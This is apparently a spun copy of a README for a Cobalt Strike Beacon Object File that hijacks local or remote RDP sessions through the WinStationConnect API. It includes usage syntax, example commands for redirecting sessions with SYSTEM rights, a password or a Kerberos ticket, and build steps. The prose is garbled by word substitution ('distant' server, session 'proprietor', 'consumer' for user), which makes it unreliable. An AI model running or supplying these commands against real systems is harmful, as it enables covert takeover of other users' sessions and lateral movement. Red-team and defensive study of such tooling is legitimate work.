Cobalt Strike Beacon Object File (BOF) that makes use of WinStationConnect API to carry out native/distant RDP session hijacking. With a legitimate entry token / kerberos ticket (e.g., golden ticket) of the session proprietor, it is possible for you to to hijack the session remotely with out dropping any beacon/device on the goal server.
To enumerate classes regionally/remotely, you would use Quser-BOF.
Utilization
Utilization: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]Command Description
-------- -----------
password Specifies the password of the consumer who owns the session to which you need to join.
server Specifies the distant server that you simply need to carry out RDP hijacking.
Pattern utilization
--------
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2
Redirect session 2 to session 1 with password of the consumer who owns the session 2 (require excessive integrity beacon):
bof-rdphijack 1 2 password [email protected]
Redirect session 2 to session 1 for a distant server (require token/ticket of the consumer who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.inside
Compile
make
Reference
tscon.exe